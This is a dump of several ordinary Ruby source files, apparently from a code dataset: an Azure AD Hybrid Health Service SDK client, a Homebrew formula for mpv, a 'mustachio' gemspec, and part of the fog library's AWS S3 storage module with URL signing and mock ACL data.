# @param service_name [String] The name of the service.
# @param filter [String] The server property filter to apply.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(service_name, filter:nil, custom_headers:nil)
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.ADHybridHealthService/addsservices/{serviceName}/addsservicemembers'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'serviceName' => service_name},
query_params: {'$filter' => filter,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ADHybridHealthService::Mgmt::V2014_01_01::Models::AddsServiceMembers.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the details of a server, for a given Active Directory Domain Controller
# service, that are onboarded to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ServiceMember] operation results.
#
def get(service_name, service_member_id, custom_headers:nil)
response = get_async(service_name, service_member_id, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the details of a server, for a given Active Directory Domain Controller
# service, that are onboarded to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(service_name, service_member_id, custom_headers:nil)
get_async(service_name, service_member_id, custom_headers:custom_headers).value!
end
#
# Gets the details of a server, for a given Active Directory Domain Controller
# service, that are onboarded to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(service_name, service_member_id, custom_headers:nil)
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, 'service_member_id is nil' if service_member_id.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.ADHybridHealthService/addsservices/{serviceName}/servicemembers/{serviceMemberId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'serviceName' => service_name,'serviceMemberId' => service_member_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ADHybridHealthService::Mgmt::V2014_01_01::Models::ServiceMember.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Deletes a Active Directory Domain Controller server that has been onboarded
# to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param confirm [Boolean] Indicates if the server will be permanently deleted
# or disabled. True indicates that the server will be permanently deleted and
# False indicates that the server will be marked disabled and then deleted
# after 30 days, if it is not re-registered.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def delete(service_name, service_member_id, confirm:nil, custom_headers:nil)
response = delete_async(service_name, service_member_id, confirm:confirm, custom_headers:custom_headers).value!
nil
end
#
# Deletes a Active Directory Domain Controller server that has been onboarded
# to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param confirm [Boolean] Indicates if the server will be permanently deleted
# or disabled. True indicates that the server will be permanently deleted and
# False indicates that the server will be marked disabled and then deleted
# after 30 days, if it is not re-registered.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def delete_with_http_info(service_name, service_member_id, confirm:nil, custom_headers:nil)
delete_async(service_name, service_member_id, confirm:confirm, custom_headers:custom_headers).value!
end
#
# Deletes a Active Directory Domain Controller server that has been onboarded
# to Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param confirm [Boolean] Indicates if the server will be permanently deleted
# or disabled. True indicates that the server will be permanently deleted and
# False indicates that the server will be marked disabled and then deleted
# after 30 days, if it is not re-registered.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def delete_async(service_name, service_member_id, confirm:nil, custom_headers:nil)
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, 'service_member_id is nil' if service_member_id.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.ADHybridHealthService/addsservices/{serviceName}/servicemembers/{serviceMemberId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'serviceName' => service_name,'serviceMemberId' => service_member_id},
query_params: {'confirm' => confirm,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Gets the credentials of the server which is needed by the agent to connect to
# Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param filter [String] The property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Credentials] operation results.
#
def list_credentials(service_name, service_member_id, filter:nil, custom_headers:nil)
response = list_credentials_async(service_name, service_member_id, filter:filter, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the credentials of the server which is needed by the agent to connect to
# Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param filter [String] The property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_credentials_with_http_info(service_name, service_member_id, filter:nil, custom_headers:nil)
list_credentials_async(service_name, service_member_id, filter:filter, custom_headers:custom_headers).value!
end
#
# Gets the credentials of the server which is needed by the agent to connect to
# Azure Active Directory Connect Health Service.
#
# @param service_name [String] The name of the service.
# @param service_member_id The server Id.
# @param filter [String] The property filter to apply.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_credentials_async(service_name, service_member_id, filter:nil, custom_headers:nil)
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, 'service_member_id is nil' if service_member_id.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'providers/Microsoft.ADHybridHealthService/addsservices/{serviceName}/servicemembers/{serviceMemberId}/credentials'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'serviceName' => service_name,'serviceMemberId' => service_member_id},
query_params: {'$filter' => filter,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ADHybridHealthService::Mgmt::V2014_01_01::Models::Credentials.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [AddsServiceMembers] operation results.
#
def list_next(next_page_link, custom_headers:nil)
response = list_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_next_with_http_info(next_page_link, custom_headers:nil)
list_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ADHybridHealthService::Mgmt::V2014_01_01::Models::AddsServiceMembers.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the details of the Active Directory Domain servers, for a given Active
# Directory Domain Service, that are onboarded to Azure Active Directory
# Connect Health.
#
# @param service_name [String] The name of the service.
# @param filter [String] The server property filter to apply.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [AddsServiceMembers] which provide lazy access to pages of the
# response.
#
def list_as_lazy(service_name, filter:nil, custom_headers:nil)
response = list_async(service_name, filter:filter, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 44.581308 | 141 | 0.701061 |
1aa312327f2dcbaa84c22fed447ec6f2e761c16a | 1,762 | class Mpv < Formula
desc "Media player based on MPlayer and mplayer2"
homepage "https://mpv.io"
url "https://github.com/mpv-player/mpv/archive/v0.32.0.tar.gz"
sha256 "9163f64832226d22e24bbc4874ebd6ac02372cd717bef15c28a0aa858c5fe592"
head "https://github.com/mpv-player/mpv.git"
bottle do
sha256 "dd0fe84dea1268524e18d210595e31b295906e334ae8114124b94a94d130de60" => :catalina
sha256 "22c3aa2fb8ec77b5125c836badf0ad7889b512280f54f310c5a6ab8e77099fa6" => :mojave
sha256 "0477b20f9a166d746d84c2a7d0b191159c6825512fe66c38ddf9ca6c43403d97" => :high_sierra
end
depends_on "docutils" => :build
depends_on "pkg-config" => :build
depends_on "python" => :build
depends_on :xcode => :build
depends_on "ffmpeg"
depends_on "jpeg"
depends_on "libarchive"
depends_on "libass"
depends_on "little-cms2"
depends_on "[email protected]"
depends_on "mujs"
depends_on "uchardet"
depends_on "vapoursynth"
depends_on "youtube-dl"
def install
# LANG is unset by default on macOS and causes issues when calling getlocale
# or getdefaultlocale in docutils. Force the default c/posix locale since
# that's good enough for building the manpage.
ENV["LC_ALL"] = "C"
args = %W[
--prefix=#{prefix}
--enable-html-build
--enable-javascript
--enable-libmpv-shared
--enable-lua
--enable-libarchive
--enable-uchardet
--confdir=#{etc}/mpv
--datadir=#{pkgshare}
--mandir=#{man}
--docdir=#{doc}
--zshdir=#{zsh_completion}
--lua=51deb
]
system "python3", "bootstrap.py"
system "python3", "waf", "configure", *args
system "python3", "waf", "install"
end
test do
system bin/"mpv", "--ao=null", test_fixtures("test.wav")
end
end
| 28.419355 | 93 | 0.689557 |
5d6139778f3e3fbc7ee1c6c4433fc7ff02fb2fec | 4,153 | # Generated by jeweler
# DO NOT EDIT THIS FILE DIRECTLY
# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
# -*- encoding: utf-8 -*-
Gem::Specification.new do |s|
s.name = "mustachio"
s.version = "0.3.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.authors = ["Aidan Feldman"]
s.date = "2012-10-10"
s.description = "Adds a 'mustachify' shortcut to magickly."
s.email = "[email protected]"
s.extra_rdoc_files = [
"LICENSE.txt",
"README.md"
]
s.files = [
".document",
".rspec",
"Gemfile",
"Gemfile.lock",
"LICENSE.txt",
"README.md",
"Rakefile",
"VERSION",
"bookmarklet.js",
"config.ru",
"config/staches.yml",
"lib/mustachio.rb",
"lib/mustachio/app.rb",
"lib/mustachio/factories.rb",
"lib/mustachio/public/favicon.ico",
"lib/mustachio/public/images/dubya.jpeg",
"lib/mustachio/public/images/guy_hecker.jpeg",
"lib/mustachio/public/images/staches/colonel_mustard.png",
"lib/mustachio/public/images/staches/grand-handlebar.png",
"lib/mustachio/public/images/staches/mustache_03.png",
"lib/mustachio/public/images/staches/mustache_03.svg",
"lib/mustachio/public/images/staches/mustache_07.png",
"lib/mustachio/public/images/staches/painters-brush.png",
"lib/mustachio/public/images/staches/petite-handlebar.png",
"lib/mustachio/rekognition.rb",
"lib/mustachio/shortcuts.rb",
"lib/mustachio/views/face_api_dev_challenge.haml",
"lib/mustachio/views/ga.haml",
"lib/mustachio/views/gallery.haml",
"lib/mustachio/views/index.haml",
"lib/mustachio/views/test.haml",
"mustachio.gemspec",
"spec/fixtures/vcr_cassettes/big_obama.yml",
"spec/fixtures/vcr_cassettes/dubya.yml",
"spec/fixtures/vcr_cassettes/small_obama.yml",
"spec/spec_helper.rb",
"spec/support/big_obama.jpeg",
"spec/support/dubya.jpeg",
"spec/support/small_obama.jpeg",
"spec/unit/analyser_spec.rb",
"spec/unit/job_spec.rb",
"spec/unit/magickly_spec.rb"
]
s.homepage = "http://github.com/afeld/mustachio"
s.licenses = ["MIT"]
s.require_paths = ["lib"]
s.rubygems_version = "1.8.24"
s.summary = "automatic mustachifying of any image"
if s.respond_to? :specification_version then
s.specification_version = 3
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<sinatra>, ["~> 1.2"])
s.add_runtime_dependency(%q<dragonfly>, ["~> 0.9.0"])
s.add_runtime_dependency(%q<magickly>, [">= 0"])
s.add_runtime_dependency(%q<rest-client>, ["~> 1.6"])
s.add_runtime_dependency(%q<addressable>, ["~> 2.2"])
s.add_runtime_dependency(%q<haml>, ["~> 3.0"])
s.add_runtime_dependency(%q<imagesize>, ["~> 0.1"])
s.add_development_dependency(%q<jeweler>, ["~> 1.6"])
s.add_development_dependency(%q<rack-test>, [">= 0"])
s.add_development_dependency(%q<rspec>, ["~> 2.5"])
s.add_development_dependency(%q<debugger>, [">= 0"])
else
s.add_dependency(%q<sinatra>, ["~> 1.2"])
s.add_dependency(%q<dragonfly>, ["~> 0.9.0"])
s.add_dependency(%q<magickly>, [">= 0"])
s.add_dependency(%q<rest-client>, ["~> 1.6"])
s.add_dependency(%q<addressable>, ["~> 2.2"])
s.add_dependency(%q<haml>, ["~> 3.0"])
s.add_dependency(%q<imagesize>, ["~> 0.1"])
s.add_dependency(%q<jeweler>, ["~> 1.6"])
s.add_dependency(%q<rack-test>, [">= 0"])
s.add_dependency(%q<rspec>, ["~> 2.5"])
s.add_dependency(%q<debugger>, [">= 0"])
end
else
s.add_dependency(%q<sinatra>, ["~> 1.2"])
s.add_dependency(%q<dragonfly>, ["~> 0.9.0"])
s.add_dependency(%q<magickly>, [">= 0"])
s.add_dependency(%q<rest-client>, ["~> 1.6"])
s.add_dependency(%q<addressable>, ["~> 2.2"])
s.add_dependency(%q<haml>, ["~> 3.0"])
s.add_dependency(%q<imagesize>, ["~> 0.1"])
s.add_dependency(%q<jeweler>, ["~> 1.6"])
s.add_dependency(%q<rack-test>, [">= 0"])
s.add_dependency(%q<rspec>, ["~> 2.5"])
s.add_dependency(%q<debugger>, [">= 0"])
end
end
| 37.080357 | 105 | 0.633036 |
f7e9c3d5de6f8fc044234d4c212371f81df098b1 | 25,787 | module Fog
module Storage
class AWS < Fog::Service
extend Fog::AWS::CredentialFetcher::ServiceMethods
COMPLIANT_BUCKET_NAMES = /^(?:[a-z]|\d(?!\d{0,2}(?:\.\d{1,3}){3}$))(?:[a-z0-9]|\.(?![\.\-])|\-(?![\.])){1,61}[a-z0-9]$/
DEFAULT_REGION = 'us-east-1'
DEFAULT_SCHEME = 'https'
DEFAULT_SCHEME_PORT = {
'http' => 80,
'https' => 443
}
VALID_QUERY_KEYS = %w[
acl
cors
delete
lifecycle
location
logging
notification
partNumber
policy
requestPayment
response-cache-control
response-content-disposition
response-content-encoding
response-content-language
response-content-type
response-expires
restore
tagging
torrent
uploadId
uploads
versionId
versioning
versions
website
]
requires :aws_access_key_id, :aws_secret_access_key
recognizes :endpoint, :region, :host, :port, :scheme, :persistent, :use_iam_profile, :aws_session_token, :aws_credentials_expire_at, :path_style, :instrumentor, :instrumentor_name, :aws_signature_version
secrets :aws_secret_access_key, :hmac
model_path 'fog/aws/models/storage'
collection :directories
model :directory
collection :files
model :file
request_path 'fog/aws/requests/storage'
request :abort_multipart_upload
request :complete_multipart_upload
request :copy_object
request :delete_bucket
request :delete_bucket_cors
request :delete_bucket_lifecycle
request :delete_bucket_policy
request :delete_bucket_website
request :delete_object
request :delete_multiple_objects
request :delete_bucket_tagging
request :get_bucket
request :get_bucket_acl
request :get_bucket_cors
request :get_bucket_lifecycle
request :get_bucket_location
request :get_bucket_logging
request :get_bucket_object_versions
request :get_bucket_policy
request :get_bucket_tagging
request :get_bucket_versioning
request :get_bucket_website
request :get_bucket_notification
request :get_object
request :get_object_acl
request :get_object_torrent
request :get_object_http_url
request :get_object_https_url
request :get_object_url
request :get_request_payment
request :get_service
request :head_bucket
request :head_object
request :head_object_url
request :initiate_multipart_upload
request :list_multipart_uploads
request :list_parts
request :post_object_hidden_fields
request :post_object_restore
request :put_bucket
request :put_bucket_acl
request :put_bucket_cors
request :put_bucket_lifecycle
request :put_bucket_logging
request :put_bucket_policy
request :put_bucket_tagging
request :put_bucket_versioning
request :put_bucket_website
request :put_bucket_notification
request :put_object
request :put_object_acl
request :put_object_url
request :put_request_payment
request :sync_clock
request :upload_part
module Utils
attr_accessor :region
def cdn
@cdn ||= Fog::AWS::CDN.new(
:aws_access_key_id => @aws_access_key_id,
:aws_secret_access_key => @aws_secret_access_key,
:use_iam_profile => @use_iam_profile
)
end
def http_url(params, expires)
signed_url(params.merge(:scheme => 'http'), expires)
end
def https_url(params, expires)
signed_url(params.merge(:scheme => 'https'), expires)
end
def url(params, expires)
Fog::Logger.deprecation("Fog::Storage::AWS => #url is deprecated, use #https_url instead [light_black](#{caller.first})[/]")
https_url(params, expires)
end
def request_url(params)
params = request_params(params)
params_to_url(params)
end
def signed_url(params, expires)
refresh_credentials_if_expired
#convert expires from a point in time to a delta to now
expires = expires.to_i
if @signature_version == 4
params = v4_signed_params_for_url(params, expires)
else
params = v2_signed_params_for_url(params, expires)
end
params_to_url(params)
end
private
def validate_signature_version!
unless @signature_version == 2 || @signature_version == 4
raise "Unknown signature version #{@signature_version}; valid versions are 2 or 4"
end
end
def v4_signed_params_for_url(params, expires)
now = Fog::Time.now
expires = expires - now.to_i
params[:headers] ||= {}
params[:query]||= {}
params[:query]['X-Amz-Expires'] = expires
params[:query]['X-Amz-Date'] = now.to_iso8601_basic
if @aws_session_token
params[:query]['X-Amz-Security-Token'] = @aws_session_token
end
params = request_params(params)
params[:headers][:host] = params[:host]
signature_query_params = @signer.signature_parameters(params, now, "UNSIGNED-PAYLOAD")
params[:query] = (params[:query] || {}).merge(signature_query_params)
params
end
def v2_signed_params_for_url(params, expires)
if @aws_session_token
params[:headers]||= {}
params[:headers]['x-amz-security-token'] = @aws_session_token
end
signature = signature_v2(params, expires)
params = request_params(params)
signature_query_params = {
'AWSAccessKeyId' => @aws_access_key_id,
'Signature' => signature,
'Expires' => expires,
}
params[:query] = (params[:query] || {}).merge(signature_query_params)
params[:query]['x-amz-security-token'] = @aws_session_token if @aws_session_token
params
end
def region_to_host(region=nil)
case region.to_s
when DEFAULT_REGION, ''
's3.amazonaws.com'
else
"s3-#{region}.amazonaws.com"
end
end
def object_to_path(object_name=nil)
'/' + escape(object_name.to_s).gsub('%2F','/')
end
def bucket_to_path(bucket_name, path=nil)
"/#{escape(bucket_name.to_s)}#{path}"
end
# NOTE: differs from Fog::AWS.escape by NOT escaping `/`
def escape(string)
string.gsub(/([^a-zA-Z0-9_.\-~\/]+)/) {
"%" + $1.unpack("H2" * $1.bytesize).join("%").upcase
}
end
# Transforms things like bucket_name, object_name, region
#
# Should yield the same result when called f*f
def request_params(params)
headers = params[:headers] || {}
if params[:scheme]
scheme = params[:scheme]
port = params[:port] || DEFAULT_SCHEME_PORT[scheme]
else
scheme = @scheme
port = @port
end
if DEFAULT_SCHEME_PORT[scheme] == port
port = nil
end
if params[:region]
region = params[:region]
host = params[:host] || region_to_host(region)
else
region = @region || DEFAULT_REGION
host = params[:host] || @host || region_to_host(region)
end
path = params[:path] || object_to_path(params[:object_name])
path = '/' + path if path[0..0] != '/'
if params[:bucket_name]
bucket_name = params[:bucket_name]
if params[:bucket_cname]
host = bucket_name
else
path_style = params.fetch(:path_style, @path_style)
if !path_style
if COMPLIANT_BUCKET_NAMES !~ bucket_name
Fog::Logger.warning("fog: the specified s3 bucket name(#{bucket_name}) is not a valid dns name, which will negatively impact performance. For details see: http://docs.amazonwebservices.com/AmazonS3/latest/dev/BucketRestrictions.html")
path_style = true
elsif scheme == 'https' && !path_style && bucket_name =~ /\./
Fog::Logger.warning("fog: the specified s3 bucket name(#{bucket_name}) contains a '.' so is not accessible over https as a virtual hosted bucket, which will negatively impact performance. For details see: http://docs.amazonwebservices.com/AmazonS3/latest/dev/BucketRestrictions.html")
path_style = true
end
end
if path_style
path = bucket_to_path bucket_name, path
else
host = [bucket_name, host].join('.')
end
end
end
ret = params.merge({
:scheme => scheme,
:host => host,
:port => port,
:path => path,
:headers => headers
})
#
ret.delete(:path_style)
ret.delete(:bucket_name)
ret.delete(:object_name)
ret.delete(:region)
ret
end
def params_to_url(params)
query = params[:query] && params[:query].map do |key, value|
if value
[key, escape(value.to_s)].join('=')
else
key
end
end.join('&')
URI::Generic.build({
:scheme => params[:scheme],
:host => params[:host],
:port => params[:port],
:path => params[:path],
:query => query,
}).to_s
end
end
class Mock
include Utils
include Fog::AWS::CredentialFetcher::ConnectionMethods
def self.acls(type)
case type
when 'private'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'public-read'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'public-read-write'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
},
{
"Permission" => "WRITE",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AllUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
when 'authenticated-read'
{
"AccessControlList" => [
{
"Permission" => "FULL_CONTROL",
"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
end
end
def self.data
@data ||= Hash.new do |hash, region|
hash[region] = Hash.new do |region_hash, key|
region_hash[key] = {
:acls => {
:bucket => {},
:object => {}
},
:buckets => {},
:cors => {
:bucket => {}
},
:bucket_notifications => {},
:bucket_tagging => {},
:multipart_uploads => {}
}
end
end
end
def self.reset
@data = nil
end
def initialize(options={})
@use_iam_profile = options[:use_iam_profile]
@region = options[:region] || DEFAULT_REGION
if @endpoint = options[:endpoint]
endpoint = URI.parse(@endpoint)
@host = endpoint.host
@scheme = endpoint.scheme
@port = endpoint.port
else
@host = options[:host] || region_to_host(@region)
@scheme = options[:scheme] || DEFAULT_SCHEME
@port = options[:port] || DEFAULT_SCHEME_PORT[@scheme]
end
@path_style = options[:path_style] || false
@signature_version = options.fetch(:aws_signature_version, 4)
validate_signature_version!
setup_credentials(options)
end
def data
self.class.data[@region][@aws_access_key_id]
end
def reset_data
self.class.data[@region].delete(@aws_access_key_id)
end
def setup_credentials(options)
